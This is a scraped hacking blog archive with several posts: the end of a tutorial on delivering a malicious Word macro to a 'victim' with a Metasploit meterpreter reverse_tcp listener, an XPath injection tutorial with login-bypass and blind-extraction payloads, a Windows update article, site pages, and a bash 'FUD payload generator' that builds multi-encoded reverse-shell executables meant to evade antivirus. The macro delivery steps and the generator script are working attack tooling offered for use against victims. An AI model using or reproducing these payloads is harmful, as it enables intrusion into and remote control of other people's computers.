<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqsla98E7Ouwwi3SkWnXDrelSajR8jtEmb3kMQih8CFkCJnssbQb07yJ5wu0Xgt0GvHIVr-URgzC2GnkGtS-cwZ7NVVBLbrEgSbOioWK-rXGb-yud7qNnTyhja7F3ICttiwjR2qogTpt5d/s1600/macro-1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqsla98E7Ouwwi3SkWnXDrelSajR8jtEmb3kMQih8CFkCJnssbQb07yJ5wu0Xgt0GvHIVr-URgzC2GnkGtS-cwZ7NVVBLbrEgSbOioWK-rXGb-yud7qNnTyhja7F3ICttiwjR2qogTpt5d/s320/macro-1.png" width="320" /></a></div>
 
(4)Remove all things from modules windows & Paste our generated VB code. 
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVKxnf_Krtgfr0u9y7E72BTus0T45K6gszzPuoJj5a6EUzv3ZS6kZPXvujD3PNID7tejrEVLjd-4xhXfIVZ1J_vyInS5D_coebzNFiTYbO010lQf8lCleCEbbBbkf0yd776slDFaBMRhyphenhyphenB/s1600/macro-2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVKxnf_Krtgfr0u9y7E72BTus0T45K6gszzPuoJj5a6EUzv3ZS6kZPXvujD3PNID7tejrEVLjd-4xhXfIVZ1J_vyInS5D_coebzNFiTYbO010lQf8lCleCEbbBbkf0yd776slDFaBMRhyphenhyphenB/s320/macro-2.png" width="320" /></a></div>
 
 
(5)Saved it as type Word Macro-Enabled Document. 
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiheZKXNuAW3VkkzLcoTASSe8CekttLrbd3tY34ILqASvIKxMIYxy7TLS4TntBUo8qotbSrblCzMKM5o1E-87-SZIxBQHcXL-Kh-vqn2l4bfevqThyphenhyphenQQbBSOShNpCofqNpI4Rc93kD6ILVW/s1600/main-3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiheZKXNuAW3VkkzLcoTASSe8CekttLrbd3tY34ILqASvIKxMIYxy7TLS4TntBUo8qotbSrblCzMKM5o1E-87-SZIxBQHcXL-Kh-vqn2l4bfevqThyphenhyphenQQbBSOShNpCofqNpI4Rc93kD6ILVW/s320/main-3.png" width="320" /></a></div>
 
Send this file to victim. By default in MS Office  " Disable all macros with notification
 " option is enabled , so whenever any document try to execute Macro it 
will pop up security warning that macro is disable ; so to execute our 
shellcode using macro victim should click on Enable content. 
 
You have to setup listener to listen reverse connection. If your IP is 
not available when victim open Document then document will be crash.So 
now we will setup listener 
 
use exploit/multi/handler 
set lhost 192.168.56.102 
set lport 443 
set payload windows/meterpreter/reverse_tcp 
set autorunscript migrate -n explorer.exe 
exploit 
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM_2P26mKyC1M3C9ipg-Z-s988i6dQyrTaL0DTJaMRaHNj8wz7AqtpVliEKulKso0pvcz1tBj3RpovC9M9P797SKq9HtTElT9kmK6S6sCCqdNh7Yyw_tcLQzncs4bzhaGzuhHre5aZZNf4/s1600/Screenshot-2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM_2P26mKyC1M3C9ipg-Z-s988i6dQyrTaL0DTJaMRaHNj8wz7AqtpVliEKulKso0pvcz1tBj3RpovC9M9P797SKq9HtTElT9kmK6S6sCCqdNh7Yyw_tcLQzncs4bzhaGzuhHre5aZZNf4/s400/Screenshot-2.png" width="400" /></a></div>
Here we setup migrate script as autorunscript so when document will closed our shell will not die.</div>
<div style="clear: both; padding: 10px; text-align: left;">
</div>
</div>

Get shell Using Shellcode in Macro.

We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload. msfconsole use payload/windows/m…

14 Jun 2014

XPATH Injection Tutorial

<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;">
<div style="text-align: left;">
XPath is a language that has been designed and developed to operate on 
data that is described with XML. The XPath injection allows an attacker 
to inject XPath elements in a query that uses this language. Some of the
 possible goals are to bypass authentication or access information in an
 unauthorized manner. 
 
We are gonna learn using simple example. Download code from <a href="http://www.4shared.com/zip/SleYPtv8/xpath.html" target="_blank">here</a> & put it in your local server directory. 
 
Sample XML Document which we gonna use:- 
 
<Employees>
 

 
  <Employee ID="1">
 
    <FirstName>Johnny</FirstName>
 
    <LastName>Bravo</LastName>
 
    <UserName>jbravo</UserName>
 
    <Password>test123</Password>
 
    <Type>Admin</Type>
 
  </Employee>
 
  <Employee ID="2">
 
    <FirstName>Mark</FirstName>
 
    <LastName>Brown</LastName>
 
    <UserName>mbrown</UserName>
 
    <Password>demopass</Password>
 
    <Type>User</Type>
 
  </Employee>
 
  <Employee ID="3">
 
    <FirstName>William</FirstName>
 
    <LastName>Gates</LastName>
 
    <UserName>wgates</UserName>
 
    <Password>MSRocks!</Password>
 
    <Type>User</Type>
 
  </Employee>
 
  <Employee ID="4">
 
    <FirstName>Chris</FirstName>
 
    <LastName>Dawes</LastName>
 
    <UserName>cdawes</UserName>
 
    <Password>letmein</Password>
 
    <Type>User</Type>
 
  </Employee>
 
</Employees>
 
</div>
<h3 style="text-align: left;">
Bypass Authentication:-</h3>
<div style="text-align: left;">
 
Browse to the login.php page; here we can see simple login form.</div>
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8wWeMWYAGp-KVIhf5FwK7xmGJ6v6Hr7BNpvAJ7WbObUG3rV6twEVkMGZnvz1RQKF_56ufDYhQdzF7mEoyTQKE3PtZ8x23-bSI_BA4tdD9k7ZTjSncMnbbAfwqn2F3CDKcvQkPLuaFN3Ci/s1600/login.PNG" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypass Authentication" border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8wWeMWYAGp-KVIhf5FwK7xmGJ6v6Hr7BNpvAJ7WbObUG3rV6twEVkMGZnvz1RQKF_56ufDYhQdzF7mEoyTQKE3PtZ8x23-bSI_BA4tdD9k7ZTjSncMnbbAfwqn2F3CDKcvQkPLuaFN3Ci/s320/login.PNG" title="Bypass Authentication" width="320" /></a></div>
 
If the application does not properly filter such input, the tester will 
be able to inject XPath code and interfere with the query result. For 
instance, the tester could input the following values: 
 
Username: ' or '1' = '1 
Password:  ' or '1' = '1 
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm7pwjMDaYEeC12zCJkRceGLlYvr_J_2Y8YtwbuSS3XP6oxYA7NbOhQB9V4LV_MSpNLP-qWv7VBAKT28RPbLALS0UfE7qeWLcKFGWPAmq6HGPUpYigRrdIP-SLeagMv6Lz8FaZ2eSkDZ7R/s1600/Bypass-Login.PNG" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypass Authentication using XPATH injection" border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm7pwjMDaYEeC12zCJkRceGLlYvr_J_2Y8YtwbuSS3XP6oxYA7NbOhQB9V4LV_MSpNLP-qWv7VBAKT28RPbLALS0UfE7qeWLcKFGWPAmq6HGPUpYigRrdIP-SLeagMv6Lz8FaZ2eSkDZ7R/s320/Bypass-Login.PNG" title="Bypass Authentication using XPATH injection" width="320" /></a></div>
<div style="text-align: left;">
</div>
<a href="https://www.blogger.com/null" name="more"></a>Looks quite familiar, doesn't it? Using these parameters, the query becomes: 
 
string(//Employee[uname/text()='' or '1' = '1' and passwd/text()='' or '1' = '1']/account/text()) 
 
As in a common SQL Injection attack, we have created a query that is 
always evaluated as true, which means that the application will 
authenticate the user even if a username or a password have not been 
provided. 
 
 
<h3 style="text-align: left;">
Blind Xpath Injection:-</h3>
<div style="text-align: left;">
 
If there is no knowledge about the XML data internal details and if the 
application does not provide useful error messages that help us 
reconstruct its internal logic, it is possible to perform a Blind XPath 
Injection attack whose goal is to reconstruct the whole data structure. 
 
Browse to the search.php page. Enter any number, When you provide number it will display FirstName related to their ID.</div>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5EPNrW9hPHlC6xfJqMyOfWzuKB0wKw2FT6O_NiAJcQcIg_4kb1YauLqHM1dYLbjoclBLoMRN-vCoXlRWAO8def0KDr6UqRfPmuptkwiJxiqB9PxMXQrzmboR3le7f5szmWtduc51XCIjB/s1600/search-first-name.PNG" style="margin-left: 1em; margin-right: 1em;"><img alt="Blind XPATH Injection" border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5EPNrW9hPHlC6xfJqMyOfWzuKB0wKw2FT6O_NiAJcQcIg_4kb1YauLqHM1dYLbjoclBLoMRN-vCoXlRWAO8def0KDr6UqRfPmuptkwiJxiqB9PxMXQrzmboR3le7f5szmWtduc51XCIjB/s320/search-first-name.PNG" title="Blind XPATH Injection" width="320" /></a></div>
<div style="text-align: left;">
Enter ' or '1' = '1 in search , & you will get all FirstName regardless of any ID(Number).</div>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgIB176INCBcADpfvHrdsGdLzI2iv-o65AYpGZps-CDSytDnqn1mpjn8ag2n-zJaAIZO5_N9m576zxjxbscb4Zod3R_n9OFvV-0mQqd7LevblyVR5LPzH0wlUH2jseLSAQmJxa3ta0IJp7/s1600/Bypass.PNG" style="margin-left: 1em; margin-right: 1em;"><img alt="Blind XPATH Injection" border="0" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgIB176INCBcADpfvHrdsGdLzI2iv-o65AYpGZps-CDSytDnqn1mpjn8ag2n-zJaAIZO5_N9m576zxjxbscb4Zod3R_n9OFvV-0mQqd7LevblyVR5LPzH0wlUH2jseLSAQmJxa3ta0IJp7/s320/Bypass.PNG" title="Blind XPATH Injection" width="320" /></a></div>
<div style="text-align: left;">
In blind Xpath injection we have to provide special crafted query to 
application, if query is true we will get result otherwise we will not 
get any result.Till now We don`t know about any parent or child node of 
XML document.</div>
<h3 style="text-align: left;">
Guessing of parent node:-</h3>
<div style="text-align: left;">
 
Supply following query to application & observe result. 
 
' or substring(name(parent::*[position()=1]),1,1)='a 
 
Nothing append , we don`t get FirstName of users.It means first letter of parent node is not "a". Now supply following query 
 
' or substring(name(parent::*[position()=1]),1,1)='E</div>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUen8jQq3c4NqkqMJBddMgqa5oTSP5yDyj70_wUe9QfLS8ajC0n6uGRlTalCWa9Q0vIbUvrytUpb1nSw1hRifMABm7IiDuV50XkZTStajP-TR_-neG95ItRNMbdch9n4JzaAeANgbNYjFa/s1600/Blind-xpath.PNG" style="margin-left: 1em; margin-right: 1em;"><img alt="Blind XPATH Injection" border="0" height="119" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUen8jQq3c4NqkqMJBddMgqa5oTSP5yDyj70_wUe9QfLS8ajC0n6uGRlTalCWa9Q0vIbUvrytUpb1nSw1hRifMABm7IiDuV50XkZTStajP-TR_-neG95ItRNMbdch9n4JzaAeANgbNYjFa/s320/Blind-xpath.PNG" title="Blind XPATH Injection" width="320" /></a></div>
<div style="text-align: left;">
You get result , It means first letter of parent node is "E"</div>
<div style="text-align: left;">
 
To guess second letter of parent node supply following query 
 
' or substring(name(parent::*[position()=1]),2,1)='m 
 
Following the same procedure, we can extract the full name of the parent node, which was found to be 'Employee'. </div>
<div style="text-align: left;">
 
We can also get child node. Browse to the xpath.php page & enter following query. 
 
//Employee[position()=3]/child::node()[position()=4]/text()</div>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbK-2z_LmxD55BO1mQs8iETOhG4nYFOXoygaVEjbhKRGt7k_856b0yclc133CQuE1uOKc8NnvKEbl0UEqEXTsNk6nSKOXAd8-bmc_RaYfq7fnyOVbgEp1j2wOTuq2AQ9Oo3XM4_AVIBiMC/s1600/Retriev+DATA.PNG" style="margin-left: 1em; margin-right: 1em;"><img alt="get-child-node" border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbK-2z_LmxD55BO1mQs8iETOhG4nYFOXoygaVEjbhKRGt7k_856b0yclc133CQuE1uOKc8NnvKEbl0UEqEXTsNk6nSKOXAd8-bmc_RaYfq7fnyOVbgEp1j2wOTuq2AQ9Oo3XM4_AVIBiMC/s320/Retriev+DATA.PNG" title="get-child-node" width="320" /></a></div>
<div style="text-align: left;">
You got output from parent node Employee id 3 & child node whose position is 2.</div>
<div style="text-align: left;">
 
To get whole document put following query. 
 
//Employee</div>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtVd5IKw6vxcwUlKpY9bTNp6R-c5BJad__ImxLBjFTAKZiHJEDcVeT5N-S6dn8h4tEez_ckKPP6pmOvGyg3Luy_7mt6IcWIngKF-3s3moUkYcRVuWng5mJH3reeAdFa4XcKrEBv6Oh5Euq/s1600/GET-DATA.PNG" style="margin-left: 1em; margin-right: 1em;"><img alt="Blind Xpath injection" border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtVd5IKw6vxcwUlKpY9bTNp6R-c5BJad__ImxLBjFTAKZiHJEDcVeT5N-S6dn8h4tEez_ckKPP6pmOvGyg3Luy_7mt6IcWIngKF-3s3moUkYcRVuWng5mJH3reeAdFa4XcKrEBv6Oh5Euq/s320/GET-DATA.PNG" title="Blind Xpath injection" width="320" /></a></div>
<div style="text-align: left;">
It`s just concept how to retrieve data from XML document using XPATH 
injection.XPath contains two useful functions that can help you automate
 the preceding attack and quickly iterate through all nodes and data in 
the XML document:</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li>count() returns the number of child nodes of a given element, which 
can be used to determine the range of position() values to iterate over.</li>
<li> string-length() returns the length of a supplied string, which can 
be used to determine the range of substring() values to iterate over.</li>
</ul>
<div style="text-align: left;">
I used recon-ng xpath bruteforcer for xpath injection attack & we will get back end XML file. 
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjYIz47sNpDRdZSZeiLrroNswhL11Igz5mVStU8o2Ak961790w2nLohMlDsZxJLNQcOvzmHAdoBYLXiKO7yCV0jQtLaRf5TAuK9_DtGaE6DkkHJTh9g86MeFueXOU9w4EbeJdNU-kp2Pjy/s1600/Screenshot.png" style="margin-left: 1em; margin-right: 1em;"><img alt="xapth-bruteforcer" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjYIz47sNpDRdZSZeiLrroNswhL11Igz5mVStU8o2Ak961790w2nLohMlDsZxJLNQcOvzmHAdoBYLXiKO7yCV0jQtLaRf5TAuK9_DtGaE6DkkHJTh9g86MeFueXOU9w4EbeJdNU-kp2Pjy/s320/Screenshot.png" title="xapth-bruteforcer" width="320" /></a></div>
 
Useful Links & Blind XPATH injection Tools:- 
 
<a href="https://www.owasp.org/index.php/XPATH_Injection">https://www.owasp.org/index.php/XPATH_Injection</a> 
<a href="http://www.blogger.com/goog_913170007"> </a>
<a href="https://www.owasp.org/index.php/Blind_XPath_Injection">https://www.owasp.org/index.php/Blind_XPath_Injection</a> 
 
XPATH BLIND EXPLORER:-  <a href="http://code.google.com/p/xpath-blind-explorer/downloads/list">http://code.google.com/p/xpath-blind-explorer/downloads/list</a> 
 
XCAT:-  <a href="https://github.com/orf/xcat">https://github.com/orf/xcat</a></div>
</div>
</div>

XPATH Injection Tutorial

XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this lan…

14 Jun 2014

Importance of software updates for the security in Windows

<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="margin: 1em 0 3px 0;">
What
 do you do when you see those little icons and pop-up messages that 
appear in the system tray, indicating there is a new software update 
available for you to download and install? Most people find such 
notifications and the process of installing new software updates 
insignificant and disrupting. The truth is, people ignore such 
notifications for various reasons, such as, ‘Do I really need to install
 this update?’, ‘My computer is working just fine, I don’t think this 
update is for me!’, ‘I don’t have time to reboot my computer’, etc</div>
<div dir="ltr" style="text-align: left;">
<div style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoB4rpdPrW93GBT2sjt1roY04fH7CJjZkqCELe8zNt-rgF4HiPAYiToU19cX6iwmyh7hXvrc2Y2_tU3lwALEPcANme0Xirp8ZaZqlgO18fXSCMaJavMteLxawj4SnI_BYXl1S4MiES0m2s/s1600/windows+update.png" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoB4rpdPrW93GBT2sjt1roY04fH7CJjZkqCELe8zNt-rgF4HiPAYiToU19cX6iwmyh7hXvrc2Y2_tU3lwALEPcANme0Xirp8ZaZqlgO18fXSCMaJavMteLxawj4SnI_BYXl1S4MiES0m2s/s1600/windows+update.png" /></a></div>
 Computers
 and computer software can quickly become out of date, requiring updates
 in order to ensure that everything is running right. The purpose behind
 the Windows Update feature is to allow Windows users on personal 
computers get the updates that they need for security, software and 
other similar purposes.Microsoft Windows typically releases their 
updates on Tuesdays, and these updates are typically a mixed bag of 
security improvements, support improvements and other updates made to 
the software and operating system running on your computer. It is 
important to make sure that you are employing the most important of 
these updates in order to keep your computer running right. software
 updates include various virus defenitions that help the program to 
identify and remove or block numerous types of malware attacks. There 
are literally hundreds of new and updated viruses and malware created 
every month. In order for software to be effective it has to know what 
to look for to find the malicious programs which is what the updates are
 for. If asoftware is not updated computers are left vulnerable to 
malicious programs like key loggers, rootkits, and trojan horses. Key 
loggers are small programs installed on a computer by hackers looking to
 steal credit card and login information. The program logs all the 
keystrokes that are made on the computer and the hacker uses that 
information to gain access to personal accounts(Bank accounts, credit 
card accounts, etc). So it is very important for your safty and the 
safty of your patrons to keep anti-virus software updated to avoid these
 types of attacks. <a href="http://secunia.com/%C2%ADvulnerability_scannin%C2%ADg/" rel="dofollow" target="_blank">there are also patch management tools we can use</a>  <ul style="background-color: white; font-size: 16px; line-height: 19.200000762939453px; list-style-position: outside; margin: 0px 0px 20px 25px; padding: 0px;">
<li style="line-height: 1.5em; margin: 0px; padding: 0px;">Microsoft's <a href="http://searchwindowssecurity.techtarget.com/downloadPage/0,295339,sid45_gci1190260,00.html" style="color: #663366; outline: 0px; text-decoration: none;" target="_blank">HFNETCHK tool</a></li>
<li style="line-height: 1.5em; margin: 0px; padding: 0px;">The commercial version of the same program, HFNetChkPro</li>
</ul>
These
 tools scan local machines or computers on a network, audit whatever's 
in reach and then produce detailed summaries or digests about what is 
installed where as well as what might need to be installed or updated. 
They do the research and make recommendations, but they don't make any 
actual changes. <div>
 </div>
</div>
</div>

Importance of software updates for the security in Windows

What do you do when you see those little icons and pop-up messages that appear in the system tray, indicating there is a new software update available for you to download and install? Most people…

14 Jun 2014

Write for us

<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="font-family: Arial,Helvetica,sans-serif;">
Do you want to build high Pr quality backlinks to your blog And More Traffic ?, </div>
<div style="font-family: Arial,Helvetica,sans-serif;">
 
<img src="http://www.opportunitiesplanet.com/wp-content/uploads/2011/08/Write-A-Guest-Post.jpg" /> 
Do you want to build high Pr quality backlinks to your blog And More Traffic ?, 
then you need to not to worry as Anonymous1769 has started to accept guest posts on their blog.Anonymous1769 is a  blog with 14k+ viewers and is updated regularly, By writting on Anonymous1769 you can get lot of exposure and traffic to your blog or website and at the same time built quality backlinks to your blog  </div>
<div style="font-family: Arial,Helvetica,sans-serif;">
One Correct Guest Post Can Change Your Entire Online Experience ! 
So Why Not Give a Try ??</div>
<h4 style="font-family: Arial,Helvetica,sans-serif;">
Requirements</h4>
<ul style="font-family: Arial,Helvetica,sans-serif;">
<li>Proper and original content</li>
<li>Proper grammar </li>
</ul>
<div>
Topics </div>
<div>
<ul>
<li>Hacking and exploits </li>
<li>web application security </li>
<li>Programing </li>
<li>iPhone and android Hacks</li>
</ul>
</div>
<h4 style="font-family: Arial,Helvetica,sans-serif;">
What well will give you in return?</h4>
<ul style="font-family: Arial,Helvetica,sans-serif;">
<li>A link to your website on the post, You'll get Lot of Traffic and Rankings on your blog by this Link</li>

 
<script type="text/javascript">var servicedomain="www.123contactform.com"; var frmRef=''; try { frmRef=window.top.location.href; } catch(err) {}; var cfJsHost = (("https:" == document.location.protocol) ? "https://" : "http://"); document.write(unescape("%3Cscript src='" + cfJsHost + servicedomain + "/includes/easyXDM.min.js' type='text/javascript'%3E%3C/script%3E")); frmRef=encodeURIComponent(frmRef).replace('%26','[%ANDCHAR%]'); document.write(unescape("%3Cscript src='" + cfJsHost + servicedomain + "/jsform-994940.js?ref="+frmRef+"' type='text/javascript'%3E%3C/script%3E")); </script>

Powered by <a class="footerLink13" href="http://www.123contactform.com/" title="123ContactForm">123ContactForm</a> | <a href="http://www.123contactform.com/sfnew.php?s=123contactform-52&control119314=http:///contact-form--994940.html&control190=Report%20abuse" rel="nofollow" style="color: #000000!important; font-size: small!important; text-decoration: underline!important;" title="Looks like phishing? Report it!">Report abuse</a> 

<li>Mail Your Guest Post on rohitb1769@gmail.com with releted pics and Your Link</li>
</ul>
<div style="font-family: Arial,Helvetica,sans-serif;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKHI22Kw3_Kvyg1hXi5dy0dICmfbrDDGFk-LPhmooQBEyvUH-VASi-CHQ_yEYcxeUBetyJvkIN_Irs2zgTVxCpRC1vwczvUltfHC1lq6LwHjdvhs2AteY__opavqhJnsqJ_FDz-Jj8Qz3W/s1600/blogger-community-tips.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="blogger-community-tips.jpg (320×240)" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKHI22Kw3_Kvyg1hXi5dy0dICmfbrDDGFk-LPhmooQBEyvUH-VASi-CHQ_yEYcxeUBetyJvkIN_Irs2zgTVxCpRC1vwczvUltfHC1lq6LwHjdvhs2AteY__opavqhJnsqJ_FDz-Jj8Qz3W/s320/blogger-community-tips.jpg" /></a> 
 
 
 
 
 
 
 
 
</div>
</div>

Write for us

Do you want to build high Pr quality backlinks to your blog And More Traffic ?, Do you want to build high Pr quality backlinks to your blog And More Traffic ?, then you need to not to worry as Anony…

07 Jun 2014

contact us

<div dir="ltr" style="text-align: left;" trbidi="on">

 
<script type="text/javascript">var servicedomain="www.123contactform.com"; var frmRef=''; try { frmRef=window.top.location.href; } catch(err) {}; var cfJsHost = (("https:" == document.location.protocol) ? "https://" : "http://"); document.write(unescape("%3Cscript src='" + cfJsHost + servicedomain + "/includes/easyXDM.min.js' type='text/javascript'%3E%3C/script%3E")); frmRef=encodeURIComponent(frmRef).replace('%26','[%ANDCHAR%]'); document.write(unescape("%3Cscript src='" + cfJsHost + servicedomain + "/jsform-994940.js?ref="+frmRef+"' type='text/javascript'%3E%3C/script%3E")); </script>

Powered by <a class="footerLink13" href="http://www.123contactform.com/" title="123ContactForm">123ContactForm</a> | <a href="http://www.123contactform.com/sfnew.php?s=123contactform-52&control119314=http:///contact-form--994940.html&control190=Report%20abuse" rel="nofollow" style="color: #000000!important; font-size: small!important; text-decoration: underline!important;" title="Looks like phishing? Report it!">Report abuse</a> 

</div>

contact us

var servicedomain="www.123contactform.com"; var frmRef=''; try { frmRef=window.top.location.href; } catch(err) {}; var cfJsHost = (("https:" == document.location.protocol) ? "https://" : "ht…

07 Jun 2014

About

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="post-body entry-content" id="post-body-2927033583117808670" itemprop="description articleBody">
<input name="IL_RELATED_TAGS" type="hidden" value="1" /> 
       
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6Kd0Nixcb2eW8RSGZbMSDEiEZDB6EY6IundGaqiIMxRAgMESfYGFT-0qKYAGkVEP-cI-vL3S9V83wChwvvo1riHsd3d_Bylgqchb-KQLIG-tTm7gUPnVSxKmCcCUb7wDjxgBTXVPJai2Z/s474-no/1891152_1469176183297163_423720208_n.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="199" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6Kd0Nixcb2eW8RSGZbMSDEiEZDB6EY6IundGaqiIMxRAgMESfYGFT-0qKYAGkVEP-cI-vL3S9V83wChwvvo1riHsd3d_Bylgqchb-KQLIG-tTm7gUPnVSxKmCcCUb7wDjxgBTXVPJai2Z/s474-no/1891152_1469176183297163_423720208_n.jpg" width="200" /></a></div>
                            
 
   Information Security 
        Learn Ethical Hacking & Security Tips ! 
          SEO & Blogging  
                  Be Visible.. Get Searched ! 
 
 
Anonymous1769 is a information security, Bloging, SEO, &  web development website. 
its definitely not a site that promotes or encourages computer and web hacking (unethical), but rather it is a Computer/ web applications Security related website. In fact, Computer Hacking/ webapplication hacking and Computer Security/web application security are the two concepts that goes hand-in-hand. They are like the two faces of the same coin. So with the existence of close proximity between Hacking and Security, it is more likely that people often mistake my site to be that promotes Hacking. But in reality, our goal is to prevent hacking. We believe that unless you know how to hack (ethically), you cannot defend yourself from malicious hack attacks.
 
<div style="clear: both;">
</div>
</div>
</div>

About

Information Security Learn Ethical Hacking & Security Tips ! SEO & Blogging Be Visible.. Get Searched ! Anonymous1769 is …

07 Jun 2014

Metasploit FUD Payload generator

<div dir="ltr" style="text-align: left;" trbidi="on">
exploit a system outside a network :) <table cellspacing="0" style="width: 600px;"><tbody>
<tr><td style="background: whitesmoke; color: black; font-weight: bold;">Code : </td></tr>
<tr><td><pre><code>
#!/bin/bash
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " "
echo " With some Randomic gravy and sauce to bypass Antivirus "
echo " http://anonymous1769.blogspot.in/ "
echo "************************************************************"</code></pre>
</td> </tr>
</tbody></table>
 
<div style="height: 500px; overflow: auto; width: 600px;">
<table cellspacing="0"><tbody>
<tr><td style="background: whitesmoke; color: black; font-weight: bold;">Code : </td></tr>
<tr><td><pre><code>
rm -rf ShellCode

echo -e "1) LanIP \n2) WanIP?"
read netchoice
case $netchoice in
1) echo "Here is a network device list available on yor machine"
 cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
 echo -e "What network interface are we gonna use ? \c"
 read interface
 IP=`ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
2) echo -e "======Getting your WAN IP========="
 IP=`wget -q -O - http://checkip.dyndns.org | cut -d ':' -f2 | cut -d '<' -f1 | cut -d ' ' -f2`;;
esac
echo $IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c $enumber -t raw | msfencode -e x86/jmp_call_additive -c $enumber -t raw | msfencode -e x86/call4_dword_xor -c $enumber -t raw | msfencode -e x86/shikata_ga_nai -c $enumber > test.c
mkdir ShellCode
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include " >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2
echo ';' >> temp2
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4

/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx
strip --strip-debug $filex
cd ..
echo " starting the meterpreter listener..."
sleep 2
